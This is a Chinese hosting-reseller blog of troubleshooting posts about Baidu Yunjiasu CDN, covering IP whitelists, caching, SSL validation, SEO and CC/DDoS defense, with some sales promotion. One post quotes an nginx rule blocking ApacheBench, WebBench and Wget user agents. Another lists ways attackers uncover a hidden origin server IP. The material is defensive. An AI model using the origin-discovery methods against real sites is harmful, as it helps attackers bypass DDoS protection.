解决办法:1.进入微信公众平台,点击开发——>基本配置 ,开启微信公众平台的开发者密码(AppSecret),记住密码,并保存;(如果没有开启,先开启) 2.进入微信公众平台,点击开发——>IP白名单,添加ip白名单,添加调用微信接口的服务器的ip地址,也就是源服务器的IP,如果更换过的,记得要更新最新的IP,然后在调用接口就不会报错了。 报错Error code: 40164, message: invalid ip,是指调用微信的接口的ip地址不在白名单内。 好了,问题就解决了,如果有什么不懂的也可以留言主机吧。 #### 使用百度云加速DNS接入会出现部分地区打不开的情况解析 最近有一位客户向主机吧反馈,网站接入百度云加速后,有时打不开,显示找不到域名的服务器IP地址。   而且ping的时候很多地方出现超时的情况 这里主机吧来解释下原因,这种情况是因为客户原来的域名切到百度云加速后,并没有立即生效,而原来的域名商因为DNS切走后,系统就直接停止之前的解析了,这就导致了DNS没更新到百度的地方会出现访问不了情况,也就是查到不到服务器IP。 要解决这个问题目前没有什么好办法解决,只能耐心等待24小时之后各地DNS慢慢更新过来,最慢不会超过48小时。 如果你很急着访问的可以换成cname别名接入,别名接入是半个小时左右生效的,而且不会出现部分地区暂时访问不了情况。 #### 使用百度云加速免费版部分地区无法访问原因 今天有客户向主机吧反馈使用百度云加速后,有部分地区反馈网站打不开,出现DNS找不到IP的情况 主机吧让客户提供了下域名,查询后我们发现客户域名使用的免费版的,百度云加速免费版节点相少,而且不提供移动节点。于是我们建议客户购买收费版的试试。 经过半小时的切换后,果然正常了! 在这里我们提醍客户,如果要更好的服务建议用收费版的,百度云加速免费版的毕竟是给客户体验用的,其限制非常大的,收费版的也不贵,详细可以咨询主机吧购买,有优惠哦。 #### 使用百度云加速后上传错误解决办法 昨天有一位新接入百度云加速的客户反馈,网站上传功能出现了错误。 针对这个问题,我们只要调整下CDN缓存即可解决。 进入百度云加速,加速功能, 缓存粒度调为:基础 智能压缩:取消掉所有压缩 图片快速加载:关掉 即可解决。   #### 使用百度云加速后动态页面打开慢经常522? 最近一新客户反馈购买百度云加速专业版后,使用后网站访问速度非但没有加速,反而变慢了,而且还经常访问显示522打不开状态。经过主机吧检查发现该网站静态页打开并没有异常,而涉及动态页面的访问就非常慢,甚至522。于是我们让客户提供宝塔后台后,发现客户启用了宝塔自带的防火墙,这们防火墙其实并不适用于CDN,会自动拦截CDN节点的IP,导致百度云加速的CDN节点被屏蔽了。于是我们让客户把防火墙关了,然后进入宝塔后台-安全功能,把已经屏蔽的百度云加速节点删除了。刷新下缓存就正常了! #### 使用百度云加速后宝塔后台登不上原因与解决办法 最近一直有客户反馈使用百度云加速后宝塔后台登不上,针对这个问题主机吧来说明下原因。 宝塔绑定域名后使用百度云加速是访问不了的,原因是百度云加速节点只支持80和443端口,其它端口都是不开放的,而宝塔的端口往往是8888端口,这个端口是访问不了的,一般CDN也不支持这类端口加速,所以就访问不了。 解决办法很简单,绑定的域名不使用加速就行,如果你已经使用了百度云加速,那么直接点编辑回源就好了。 状态为OFF就表示回源了。 需要特别提醒的是为了不暴露您的源站服务器IP,主机吧建议您把宝塔的绑定子域名起得复杂些。 #### 使用百度云加速后广告联盟反屏蔽不显示广告什么原因 最近有站长遇到使用百度云加速,百度广告联盟的反屏蔽不显示广告的问题。 这里主机吧来给大家说明原因: 之前所以反屏蔽不显示广告是因为百度广告联盟生成反屏蔽的时候,会自动把你的域名推送到百度云加速帐户上。 而很多时候一些站长使用的另一个帐号接入百度云加速的,这样就导致了联盟帐号上的域名失效了。 解决办法很简单,我们只需要用百度联盟的帐号登陆百度云加速接入域名即可。 记住登陆云加速的时候选百度推广帐号登陆,而不是用百度帐号。 登陆帐号后重新添加验证过域名即可,还有一点需要注意的事,一定要用cname别接入,千万别用NS方式接入,这样也是不行的。 如有不懂的可以联系主机吧咨询,欢迎多多支持主机吧博客,您的支持就是我们的动力! #### 使用百度云加速后排名掉了?收录没了? 最近有位客户跟主机吧反馈说是使用百度云加速后,网站关键词排名掉了,网页收录也没了。 对于这个问题主机吧曾经有回答过这类问题,今天我们再来解释下:使用百度云加速并不会对网站收录与排名有不良影响,反而使用百度云加速后,更能增加百度蜘蛛到访的次数,从而增加索引量。 那么影响网站排名与收录的原因是什么呢?主机吧多年建站经验来告诉大家: 1. 服务器稳定性 很多站长使用百度云加速都是冲着防御来的,而想要安全防御,被攻击过的IP是要更换新的,所以在更换新IP后,百度蜘蛛会有一两天时间没有更新过来,从而造成了访问不到主机的情况,这就会影响排名,我们需要做的是进入站长平台-抓取诊断-查看是否更新过来,如果IP没有更新过来,那么我们可以直接反馈,或者等一两天百度自然更新至新IP或者百度节点。不仅是这个问题还有我们被攻击的时候也会时常出现502等现象,这同时影响服务器稳定,需要做好及时开启防护,以免百度蜘蛛刚好访问,你的网站刚好502,那就会出现大量错误了。 2. 网站内容合法合规 这个是百度收录的基本要求,如果你的内容有灰色,或者违法内容,百度即使收录了,也会过段时间自动消失,百度有安全检查系统,一但出现违法内容,就会自动删除,要不然百度早就到处都是违法内容了,所以想要收录稳定,内容正规是必要的。 3.网站内容原创性 同样的内容,如果你只是复制别人的,那么你肯定是争不过那些大型网站排名的,因为他们本身自带很强的权重,百度会认为他们比较有权威,给以他们更好的排名。而你网站既没有权重,内容也是复制别人的,那么排名会非常低,甚至百度不会收录你的内容,所以想要好排名,你发布的内容必须原创,而且质量要比别人好,才会有排名。这点主机吧深有体会,主机吧博客的许多文章都是原创的,所以百度上很容易搜到,设置一页里有二三篇文章都是主机吧的。 4.网站更新频率 虽然百度没有特别要求每天更新网站,但是主机吧认为良好的更新频率可以养成搜索引擎每天光顾的习惯,从而提高收录时间,主机吧就是保持每天更新一两篇文章,有时候一天就被百度放出来了,而且还得到不错的排名,所以主机吧建议网站保持每天更新,即使没有原创,也要转载一些相关的文章出来。 5.随时关注百度发布规则算法 主机吧发现一些站长不关注规则算法的,然后突然某一天发现网站收录大量掉,设置消失都不知道原因。其实百度每年都更新算法,如果你网站刚好中了算法,那么就要及时整改,别等到百度处理了,才反应过来,那时候已经迟了。 百度算法发布规则地址:https://ziyuan.baidu.com/college#/type=4&cate=rules 好了,以上就是主机吧对百度排名收录的一些心得,希望可以帮助大家,共同进步,欢迎关注主机吧。   #### 使用百度云加速后有部份用户访问IP是美国IP怎么办? 偶尔我们会遇到一些用户反馈,接入百度云加速后,有些用户访问时会访问到云加速的美国节点,倒时访问卡,甚至打不开。 遇到这种情况一般是客户本地电脑使用DNS用的是国外的,导致百度CDN分配访问IP的时候分配到了海外节点。 要如何查呢?首先运行——CMD 输入ipconfig /all 回车 我们就可以看到我们本地DNS是用哪个IP了,比如主机吧的就用114的,很准,属国内的,所以一般百度分配CDN不会出问题 而一些用户可能用了谷歌的DNS,如8.8.8.8 查到问题后我们直接修改本地DNS就行了,国内的建议用114DNS,稳定,速度快,安全。 如果不想换DNS的,也可以直接联系官方企业QQ,让他们给你把国外的节点取消掉。   #### 使用百度云加速后百度蜘蛛抓取失败? 最近有一位客户向主机吧反馈:网站使用百度云加速后,百度蜘蛛不抓取了,百度站长平台抓取失败。 针对这个问题,主机吧专门测试了下,演示网站,发现并没有出现抓取失败的情况。 主机吧这个网站接入好几年了,也没有出现抓取失败的情况。 那为何客户出现这个问题呢? 针对这个问题,主机吧经验来看有以下情况: 网站源服务器更换过IP 很多站长接入百度云加速都是用来防御攻击的,在接入之前都是把源服务器IP更换一个新的隐藏起来,而百度蜘蛛更新抓取网站IP是有生效时间的,一般48小时左右,而在这48小时内,百度蜘蛛会一直抓取的是旧的IP, 这也就导致百度站长平台抓取一直失败。 2.更换DNS所致 一些客户选择的是NS接入,而DNS更改是有生效时间的,一般全部生效72小时左右,在这期间如果把原来的DNS解析删掉的话,会出现部分地区无法访问的情况,百度自然就抓取失败。 3.服务器内置有防火墙 接入百度云加速后,一定要第一时间把百度云加速的IP段加入服务器防火墙白名单,否则会出现防火墙拦截百度节点的情况。 4.百度节点下线所致 百度云加速是高防CDN,CDN的IP都是动态的,当节点故障的时候就会自动下线。如果百度蜘蛛刚好抓取的是这个节点的话,那么就会出现无法请求的情况。所以我们在使用CDN的时候,最好用cname接入,然后用DNS搜索引擎回源处理,这样百度蜘蛛访问网站的时候就不会经过百度云加速节点了。 至于为什么百度蜘蛛不来,主机吧了解后,发现这个客户网站是一个新站,百度蜘蛛在经过首次抓取后,一般会有一个观察期,所以蜘蛛来得少,或者不来都是正常的,耐心等待百度搜索放出来就行了。 这里要说下,网站源服务器稳定是搜索引擎SEO的重要基础,想要蜘蛛常来,源服务器一定要稳定,速度快,网站内容要保持每天更新,不能三天打鱼两天晒网。 #### 使用百度云加速后网站上传文件异常 最近有站长向主机吧反馈,说是网站上传大文件时候上传不了,提示异常。 经主机吧查询后发现,这是因为客户上传的单个文件大小超过了百度云加速版本的限制,比如现在这位客户上传的文件高达900多M   而他使用的商务版最大只支持500M单文件上传,也就导致了上传到一半的时候显示异常,想要解决只能升级版本了。 目前百度云加速的各版本单文件上传限制为: 免费版100M 专业版200M 商务版500M 企业版1G 开启单文件最化功能在百度云加速CDN加速功能- 最大上传文件大小   如果你需要更大的上传文件的,比如超过1G的,则需要购买百度云加速定制版,详细价格可咨询主机吧。 #### 使用百度云加速后网站代码出现edge.yunjiasu.com代码原因 最近有站长反馈网站在接入百度云加速后,链接代码变成了百度的链接,如 <script src="https://edge.yunjiasu.com/cdn-cgi/scripts/a2bd7673/cloudflare-static/rocket-loader.min.js" data-cf-settings="b369f48985a39770b9af5d8a-|49" defer=""></script><script type="text/javascript" src="https://idm-su.baidu.com/su.js"></script> 很多人以为这是百度云加速给网站挂的广告,在这里主机吧要说明下,出现这个原因是由于站长在接入云加速的时候设置开启了自义规则中的 javascript快速加载 功能 这个功能的作用是可以让网站的JS文件快速加速,有点类似于调用公共库的感觉,不过这个功能对有些网站是不适合的,可能会影响一些网站的功能,比如一些JS广告可能会无法正常显示,所以主机吧不推荐大家开启。 #### 使用百度云加速后网站图片出现加载不了的情况 最近有位站长向主机吧反馈: 我的图片服务器最近老是出现访问图片批量报错的情况,但是把图片地址复制出来,单独访问一下,虽然访问的时候很慢,但是打开了之后再访问就都没问题了是啥情况?单独把图片复制出来,放到浏览器里访问一下,再刷新页面就都正常了以前几乎都没出现过这种问题,就最近频繁的出现页面和图片是同一个源服务器,页面访问很正常,云加速的IP是加了白名单的啊 主机吧通过测试后发现该网站各地访问并没有出现502,522的情况。 那么说明并不是服务器拦截百度云加速节点,而通过访问速度也不慢,说明也不是服务器过慢导致打不开。 然后,主机吧让站长提供下打不开的IP,发现该之所以打不开,是因为他的本地IP被百度云加速拦截了。 出现这个情况,可能是站长不知道什么原因触发了百度云加速的CC防护规则,我们只需要把本地IP加白就行了,或者进入安全功能-ADS,关掉CC防护即可。 #### 使用百度云加速后网站手机页无法正常显示原因处理 常用客户因为使用云加速后网站页面显示一直在加载中,这种现象主要出现在动态调度的网站,比如淘宝客网站,这类网站一些参数是不能缓存的,所以导致网页加载失败。 那么解决办法很简单,进入域名管理,加速功能,CDN,缓存粒度设置,选择:基础模式   这样就可以解决加载不出的情况了。 大家可以根据自己的网站选择不同的模式。 按等级对缓存文件进行粒度设置 基础:只缓存基本的不带参数的静态文件 简单:可以缓存带参数的静态文件,会忽略参数 细致:会根据不同的参数缓存不同的文件       #### 使用百度云加速后网站提示此网站无法提供安全连接原因 一些网站接入百度云加速的时候打开提示:此网站无法提供安全连接  使用了不受支持的协议。 原因是源站启用了HTTPS安全协议,如果您用的是免费版的云加速是不支持HTTPS加速的。 如果你用的是收费版的,请到云加速域名管理,加速功能,HTTPS加速,开启全程加密模式。 然后进入CDN,全部缓存刷新   剩下的就等生效就行,最迟24小时,一般4小时左右就可以正常访问了。 #### 使用百度云加速后网站被河北通信管局拦截了? 最近主机吧的一位客户遇到一个问题,反馈河北用户打开都提示: 该网站暂时无法访问 原因一:该网站涉嫌电信网络诈骗 原因二:该网站存在重大风险 原因三:该网站存在不适宣传的信息 原因四:该网站尚示完成备案 本页面为默认提示页面,如存在以上问题,请联系网站负责人及时处理。 一开始客户以为是百度云加速分配的河北节点问题,不过经过主机吧强制解析河北节点后,发现并没有出现拦截的情况,那么说明并不是这个问题。客户找了个河北用户ping了下域名,显示如下: ping出来的IP是139.198.5.172 这个IP并不是百度云加速的IP节点,而是来自北京的IP,而正常的解析是如下 从上面图片我们可以看到,如果经过百度云加速解析的节点 是会显示百度云加速的别名的:*.cname.yunjiasu-cdn.net,而河北用户是直接ping出非云加速节点,到这里就非常清楚了,域名是直接从客户DNS端已经拦截了,那就是我们常说的劫持,那么是谁劫持呢?答案是河北通信管局劫持的。想要解析劫持问题只能通过河北通信管局解决。 回到之前的显示的页面: 原因一:该网站涉嫌电信网络诈骗 原因二:该网站存在重大风险 原因三:该网站存在不适宣传的信息 原因四:该网站尚示完成备案 详细可以到河北通信管局官方网站咨询:https://hbca.miit.gov.cn/ #### 使用百度云加速后网站访问出现416错误 最近有客户反馈网站启用百度云加速后出现416错误,网站打不开。 经主机吧查看后发现是客户服务器开启了防火墙限制了百度云加速节点抓取导致的。 解决办法: 1 关掉服务器防火墙,清除已屏蔽的百度云加速IP节点 2 把百度云加速的IP段加入白名单 以下为云加速IP网段,请各位注意更新白名单,如您的网站系统不支持掩码模式,可将其转码成IP段后再添加。感谢您的支持 ! 天津        111.32.135.0/24  111.32.136.0/24      125.39.174.0/24       125.39.239.0/24   上海        112.65.73.0/24    112.65.74.0/24        112.65.75.0/24   重庆        119.84.92.0/24    119.84.93.0/24     113.207.100.0/24    113.207.101.0/24      113.207.102.0/24 上海        180.163.188.0/24   180.163.189.0/24   163.53.89.0/24    101.227.206.0/24   101.227.207.0/24 济南        119.188.97.0/24        119.188.9.0/24   苏州        61.155.149.0/24        61.156.149.0/24        61.155.165.0/24   河北        61.182.137.0/24        61.182.136.0/24        120.52.29.0/24        120.52.113.0/24   南宁        222.216.190.0/24        219.159.84.0/24 佛山        183.60.235.0/24        116.31.126.0/24        116.31.127.0/24   西安        117.34.13.0/24        117.34.14.0/24 郑州        42.236.93.0/24        42.236.94.0/24   青岛        119.167.246.0/24        150.138.149.0/24        150.138.150.0/24        150.138.151.0/24   福州        117.27.149.0/24 湖南        59.51.81.0/24        220.170.185.0/24        220.170.186.0/24   东莞        183.61.236.0/24        14.17.71.0/24      119.147.134.0/24   沈阳        124.95.168.0/24        124.95.188.0/24   洛阳        61.54.46.0/24        61.54.47.0/24   杭州        101.71.55.0/24        101.71.56.0/24   广州        183.232.51.0/24        183.232.53.0/24        157.255.25.0/24        157.255.26.0/24   江苏        112.25.90.0/24        112.25.91.0/24        58.211.2.0/24        58.211.137.0/24 湖北        122.190.2.0/24        122.190.3.0/24   广东        183.61.177.0/24        183.61.190.0/24   杭州        117.148.160.0/24        117.148.161.0/24   宁波        115.231.186.0/24        115.231.187.0/24 添加白名单注意事项:192.168.0.0/24就代表了192.168.0.0至192.168.0.255整个C段 安全狗用户、云锁用户与iptables用户,可以在本页面直接下载附件后导入配置,即可成功添加。 云锁文件   安全狗文件    IPtables文件 #### 使用百度云加速后网页打开空白原因解析 最近有一位客户向主机吧反馈,使用百度云加速后,网站首次可以打开,而内页打开空白。 经查询我们发现该客户IP触发了百度云加速的防护机制,导致被CC拦截了。 解决办法很简单,只要把客户自己的IP加入百度云加速安全白名单就可以解决了,进入安全功能-IP防火墙-添加IP白名单 #### 使用百度云加速后,还能使用百度联盟反屏蔽服务吗? 问:使用百度云加速后,还能使用百度联盟反屏蔽服务吗? 答:同一主域两边不能同时接入使用,需要用反屏蔽的建议更换另一个主域名添加反屏蔽服务。 #### 使用百度云加速和不使用百度云加速网站百度抓取频率对比 很些人说使用了百度云加速对SEO没什么帮助,其实是错误的,百度云加速对SEO还是有作用的,这里我们来对比下使用百度云加速和没有使用云加速两个网站的抓取数据对比。 (zhujib.com)未使用百度云加速网站抓取频次 (www.sudujun.com)使用百度云加速网站抓取频次 从上图我们可以看到未使用云加速的网站抓取频次远低于用了云加速的网站,而且主机吧使用了上面数据的云加速网站还是一年多没有更新的百度云加速专业版演示站,百度抓取频率依然比主机吧这个每天更新的博客抓取频率还高。 当然抓取频率的高低并不能给我们带来实际的流量,但可以使百度更快的发现我们的网站内容,如果内容质量过关,百度收录更快,而且排名更好,像一些时实新闻类的文章对截取百度流量是非常有帮助的,如果你的网站每天更新频繁,那么用百度云加速是不错的选择。很多人以为用了百度云加速就会有流量这是错误的,SEO不是这么容易的一件事,需要网站不仅内容质量要,保持原创,还需要内容竞争对手少,假如你的内容已经烂大街了,就算你是原创也没有,因为已经有同样内容了,百度不会再给你一个新的网站很高的排名,所以我们要在内容上下功夫,百度云加速只是辅助你内容让百度收录更快并不能决定你网站的排名。 不过如果你是新闻网站,利用百度云加速可更新收录这点,倒是可以收获不错的流量,主机吧曾经利用演示站发突发性新闻内容,结果百度秒收,并给了前三的排名,当天那文章就收获了上千IP量,但是因为新闻网站很难有收益,所以主机吧也就放弃了做新闻网站的想法。 #### 使用百度云加速商务版为资讯网站成功防护CC攻击战纪 昨天一客户联系上主机吧反馈说公司网站被CC攻击一个月了,一直处在打不开的状态,想让主机吧帮忙进行防护。主机吧向她推荐了百度云加速的商务版,由于她不懂什么操作,所以全程让主机吧进行代理操作。 这里主机吧来说下成功解决的流程: 9.30:为了更快的看到效果,主机吧采用的是cname接入方式 10.00:接入成功后,等半小时服务器内存CPU内存有明显的降低,不再是满负荷状态 10.05:这个时候网站已经可以正常访问,我们进行了观察检测 14.00:对方进行了变更攻击,已经绕过百度云加速默认防护规则,服务器再次CPU 内存满负荷 14.03:我们启用百度云加速强力防护模式 14.08:强力防护模式防护效果很显,服务器CPU内存马上降了下来 14.10:由于普通节点的强力防护模式有5秒检测,影响体验我们给客户开启了超级清洗中心,取消5秒 14.12:取消5秒后CC攻击依然穿透了百度云加速的上海超级清洗中心,网站又访问不了 14.13:我们联系上百度云加速企业QQ客服,让他们调整CC防护规则 14.14:百度云加速客服反馈后台调整 14.30:百度云加速调整防护并拉黑一批代理IP 14.31:服务器指标恢复正常,网站正常打开 15.00-16.00:观察测试一切正常,完成防护! 测试一天后,客户很满意并推荐其它客户使用我们产品,我们非常感谢客户的肯定!     #### 使用百度云加速域名经常掉备案怎么回事? 最近有一位客户使用百度云加速后,没几天域名备案就掉了,那客户怀疑是百度云加速搞的鬼…… 今天主机吧就来聊下备案掉的问题。 首先回答域名备案掉这个跟百度云加速真的没关系,百度云加速并不会涉及备案接入,一没权限取消你的备案接入二也不会做损害自己利益的事,想想你只有一直用云加速他们才有收入不是吗? 那么备案掉是怎么回事呢? 这个问题其实不只出现在使用百度云加速的客户上,使用高防IP的客户也有反馈过。原因大多是备案接入商取消掉备案了。 那为何接入商会取消掉备案呢?我们以阿里云为例,假如你在阿里云备的案,但是你备案通过后,并没有使用阿里云的国内服务器,阿里云就会检查得出来,说你没有使用他们的服务,就有权取消你的备案。 或者你当时备案的内容与你现在做的网站内容严重不符,或者个人备案做的却是企业网站,又或者网站有违法内容,这都会引起阿里云备案取消。 如果确保网站备案不会被接入商取消? 1.主域名,比如www或者@必须解析至备案接入商的服务器。 2.如果使用CDN,那要使用cname别名记录接入,而且必须保持正常打开状态 3.网站内容要没有违规内容 4.保持域名备案人的电话邮箱畅通,一般备案接入商取消备案前都是会发邮件提前通知的 最后,备案号被取消还有一个可能,就是备案人自己取消的,如果你是购买的备案域名,那么备案号被取消的风险是非常大的,因为一般人网站不做了都会取消备案的,保留备案的人很少很少。 #### 使用百度云加速备案号会被注销吗 经常有客户反馈说备案号被注销了,原因是使用CDN后,网站显示IP不是空间商提供的IP了,导致检测备案不一致。 这里我们说明下:使用CDN并不是影响网站备案的,也不会因为使用CDN而被注销备案。 原因是备案检测是按未解析到备案接入商或无流量请求至备案接入商,才会显示接入商不一致, 这里的接入商是指你当初备案的空间商,有些同学在阿里云备的案,然后使用别的空间商的服务器,这样就会显示接入商不致,阿里那边会检测出来的,检测出来后就会注销,这也是为什么很多人说接入CDN后备案会被注销,其实就是你现在用的服务器不是你之前备案的空间商的。 而使用百度云加速CDN后,只要域名有流量请求至备案接入商,是不可能被注销的。 #### 使用百度云加速备案掉了怎么办? 还能使用百度云加速吗? 最近有遇到过一些网站因为各种原因网站备案掉了,导致无法正常使用国内节点,那要怎么办呢? 这里主机吧给大家说明下: 备案掉了在主机吧这边购买的可以直接转成海外版,依然可以正常使用百度云加速防御,只不过海外版没有国内节点,访问速度会慢许多。 所以建议有条件的同学还是继续备案,备案通过后转国内版本。 #### 使用百度云加速如何免费申请SSL证书 百度云加速收费版的都支持免费申请的专属域名SSL证书,管理起来也非常方便,不过还是有一些站长管理员并不知道如何申请。 今天我们来教大家如何申请免费申请SSL证书。 1.进入已接入的百度云加速域名管理,证书管理,证书申请 3.进入点击申请证书 4.选择要申请证书的域名(详细到子域名),选择验证方式,这里主机吧选择文件校验方式,生效较快。 5.提交后,得到相应的验证文件地址, 6.这里的校验估计有很多人不会   7.首先在本地电脑建一个文本文档,输入上面的验证文件值 8.然后文件别存为文件路径中的文件名(fileauth.txt) 9.本地电脑保存文件后,我们再上传到相应的网站空间路径上,/.well-known/pki-validation/fileauth.txt,如果没有/.well-known/pki-validation/这两个目录,我们就自己创建, 10.创建成功后,我们再上传fileauth.txt到pki-validation目录下 11.访问 http://你的域名/.well-known/pki-validation/fileauth.txt 可以看到你上传的文件验证值,即可表示操作正确 12.完成以上校验操作后,我们直接等SSL证书服务商自动验证过即可,一般不会超过2小时。 #### 使用百度云加速如何有效防御DDoS攻击 我们都知道百度云加速防御DDoS攻击效果是非常好的,但有时候防御效果也不是很好,比如今天主机吧这位客户就是因为某些原因,服务器被DDoS了,用了百度云加速也没用。 下面我们来盘点下什么情况下,百度云加速防御是没有效果的。 1. 网站之前IP已经被DDoS攻击过了 首先绝大多数的DDoS攻击都是针对IP的,而在使用百度云加速之前你的IP已经被黑客知道了,黑客可以直接你的服务器IP,不经过百度云加速,使防御无效。解决办法就是更换一个新的服务器IP隐藏起来。 2.域名下的其它子域名并没有解析至百度云加速 黑客可以通过别的子域名解析查找到你的源服务器真实IP,从而进行攻击,还是可以绕过百度云加速防御,解决办法:所有子域名必须使用百度云加速隐藏起来。 3.同台服务器上有其它域名解析服务器IP 同台服务器上有其它域名被攻击,并且没有使用百度云加速的,一样会影响到服务器防御效果。解决办法:把同台服务器域名也加上百度云加速或者把要防御的域名单独使用一个服务器。 #### 使用百度云加速如何防护CC攻击 使用百度云加速最主要功能是防御攻击,ddos我们就不多讲了,只要你自己不主动暴露源服务器IP,黑客基本是攻击不到你的服务器的,所以DDoS攻击基本对百度云加速无效。 那么只有CC攻击了,很多网站管理员只是简单的接入百度云加速,以为就可以防CC了,其实并不是的。百度云加速默认有对一些明显是CC攻击的请求进行拦截的,比如单IP访问频率,访问路径等特征进行拦截,但有些黑客肉鸡多的话是可以有效规避掉这些特征的,那么怎么办呢? 这个时候就需要我们开启百度云加速的某些功能进行防护。 进入云加速域名管理,安全功能   WAF-开启Web应用防火墙-调整安全验证有效期(5分或者15分)-开启浏览器检查-开启防盗链 进入安全功能-ADS-开启CC防护:强力防护模式 等待10分钟,网站即可恢复正常,如果网站没有正常,请重启下服务器即可。 需要注意的是开启强力防护模式后,百度云加速会对访问网站的每一个IP首次访问进行一个5秒的安全检测,一但检测是攻击IP会进行拦截,如果是正常用户会放行,几乎可以做到拦截成功率达99.9%,几乎0误杀。 当然访问体验上肯定是有一些影响的,管理员可以等没攻击了再关了就行了。 开启强力防护对某些APP访问是有影响的,如果你不想要5秒检查,但又想防护CC怎么办? 可以开启超级清洗中心(这功能需要商务版以上才支持) 开启后需要等半小时才可以生效,开启后百度云加速会把防护节点调整至上海ADS高防中心防护,可以有效防护DDOS/CC攻击,但需要注意的是上海ADS高防节点是没有加速效果的。 如果半小时后仍没办法正常拦截CC攻击,那么你可以直接联系官方企业QQ4008768800 ,让他们给你调整防御规则,百度云加速技术会根据本次CC攻击的特征给你进行调整防御规则,一般都是可以解决的。当然如果啦主机吧一般推荐直接用强力防护模式,毕竟自义防御规则误杀率还是有的。 如果懂一些技术的,也可以自己自义防御规则,比如对方如果只攻击你的首页,那么我们完全可以只给首页做强力防护。 进入域名管理-其它-特定页面规则   添加如下图规则 具体设置: 地址写:你的域名/(如zhujib.com/)记住一定要带/,这样表示只设置首页 缓存力度设置:可设置细致或者所有都缓存(如果首页是动态页的,不要用所有都缓存) 节点有效期:这个随意,不过设置越长对服务器压力越小 浏览器缓存有效时间:这个随便 永久在线:开启 图片延迟加载:开启 参数排序:开启 加速:这个不要开启,因为经常有些用户的JS开启后是不显示的 通用安全设置:开启 CC防护:强力防护 浏览器检查:开启 好了,设置完成添加即可。 懂点技术的可以检查自己的网站日志,看黑客是攻击哪个URL地址的,然后就把那个URL设置强力防护模式即可。   好了,以上就是百度云加速CC防护的一些功能技巧,希望可以帮助大家。   #### 使用百度云加速如何防止真实服务器IP暴露 我们在使用百度云加速的时候,大多数情况下都是为了防止被DDoS攻击,而防止DDoS攻击的最有效方法就是把IP隐藏起来,使用高防CDN防御,这样对方就找不到攻击目标了。 因为此在使用百度云加速的时候,我们保证服务器真实IP不能暴露,今天主机吧就来教大家如何防止真实IP暴露。 1. 被DDoS过的服务器肯定是暴露的 如果你的服务器IP在一天内被DDoS过的,那么即使你现在隐藏起来了,也一样是暴露状态的,因为攻击者之前已经知道你IP了。 2.同服务器域名解析暴露 一些客户同一台服务器同时运行了几个甚至几十个网站,而这些网站都是直接解析服务器真实IP的,这就暴露真实IP了,我们要做的是给被DDoS攻击的网站分配一个独享的服务器。 3.二级域名解析真实服务器IP 很多站长容易犯的错误,他们以为攻击者只会攻击他们的主域名,却不知道黑客如果看到主域名有防御了,就会扫描你的二级域名,如果你的二级域名刚好没做隐藏,那就中招了。 4.旧IP历史没更新 很多站长工具是可以查到我们网站曾经使用过的IP的,比如站长之家的SEO工具,就会缓存你曾经某段时间的IP地址,如果你不去更新他的缓存,他就会一直保留,所以为了安全起见,最好的办法是更换新的IP。 5.更换IP还是同段位的 某些服务器商的IP资源非常的少,更换IP都是改变后面几个数据而以,比如220.170.186.132,更换后220.170.186.133,这其实给黑客查找源IP大大减少了难度。像阿里云或者腾讯云这种大公司更换IP都是会把前面的数字变更的,这样大大增加了难度。 6.本地邮件发送暴露IP 一些网站提供邮件发送服务,而这些邮件发送是由真实服务器IP发送出去的,这也就导致你不管换哪个服务器对方都是可能查到你的真实IP,因为本地邮件服务发送的时候,是会显示发送者的IP地址。解析办法是修改程序,使用第三方邮件推送服务。 好了,以上就是一些可能暴露源服务器IP的原因,我们只要把这些修正,就可以完成真实IP隐藏了。   #### 使用百度云加速开启强力防护后微信支付无法回调怎么办? 客户问题:走cdn后 微信支付回调会出问题怎么办? 答:进入安全功能-IP防火墙,把微信支付的IP段加入白名单。 微信支付IP段: 上海电信出口网段:101.226.103.0/25上海联通出口网段:140.207.54.0/25上海CAP出口网段:121.51.58.128/25(新增)深圳电信出口网段:183.3.234.0/25深圳联通出口网段:58.251.80.0/25深圳CAP出口网段:121.51.30.128/25(新增)香港出口网段:203.205.219.128/25 #### 使用百度云加速微信和百度APP打开显示403? 最近有一位客户在nginx加了一段代码如下: if ($http_user_agent ~ ApacheBench|WebBench|Wget) { return 403; } 说是可以禁止恶意压力测试,说白了就是恶意CC攻击,但这个其实是没用的,上面的特定代码其实意思就是禁止某些特定UA访问,这些UA访问后服务器会反回403 这段代码其实没什么问题,但是用这段代码后在微信和百度APP访问你的网站就会返回403,主机吧看过,微信和百度APP进来的就是中了上面的UA禁止。 如果你的网站在微信和百度APP上打开也出现403的,请检查下WEB环境是不是加了这个代码所致。 #### 使用百度云加速的真实用户评价 经常有站长咨询主机吧百度云加速的怎么样?防御怎么样? 这里主机吧跟大家举个案例,事情是这样的,最近主机吧代理了一个高防CDN,目前测试还是不错的。正好有用户想买高防,但是觉得百度云加速是一年一年付的,有点长,想问下主机吧有没有办法开月付,于是主机吧就推荐他用另一家的高防CDN,支持月付,价格也还不错。 不过这位客户完全不考虑别家产品,下面是聊天记录: 从上面聊天记录可以看出,百度云加速防御效果还是得到客户的认可的。 不过百度云加速还是有很多缺点的,比如无法自义端口,无法防御APP的CC攻击,无法自义CC防御规则等,都需要百度云加速解决,作为百度云加速代理商,我们真心希望百度云加速越做越好。     #### 使用百度云加速的误区:强力防护模式没用 最近发现很多站长在使用百度云加速后,被攻击后启用强力防护模式,发现网站还是无法正常,所以认为强力防护没用。 这里主机吧需要明下,百度云加速目前是防御CC攻击最有效最直接的方法,可以说做到拦截99.999%的攻击,而且误杀率极低。 那么为何有些客户认为没用呢? 主机吧发现目前客户进入了一个误区,以为启用后,网站马上会恢复! 这是错的,事实上一但启用强力防护,百度节点就已经有效拦截 了,客户网站之所有没有恢复是因为客户网站源服务器在之前没开启强力防护就已经被CC攻击导致WEB环境挂了,有的甚至服务器死机了,导致后面百度云加速即使拦截了也无法恢复过来. 所以开启强力防护模式的正确操作是,开启后等上15分钟左右,网站是否恢复,如果没有恢复请直接重启源服务器。 需要说明的是,如果网站本身开启了规则自定义的,请在规则自定义里面开启强力防护模式,否则其它地方开启防护模式将不生效。 #### 使用百度云加速防御1600万次峰值CC攻击的经历 最近有位站长向主机吧求助,表示自己的网站连续几天遭到了超大CC攻击,导致网站长时间打不开。 考虑到经济性,主机吧推荐使用了百度云加速商务版,这个版本防御CC还不错,一般的中大型CC攻击都可以防。 在经过了简单的接入后,我们迎来了一波大型CC攻击,不过好在百度云加速成功拦截住了这次CC攻击,进入百度云加速数据报表-安全报表查看后,发现攻击峰值高达1683.99万!非常的高。 经验告诉我们,CC攻击的周期一般都是几个月甚至更长的,所以我们要做好长期防御的准备。 #### 使用百度云如何做公安备案 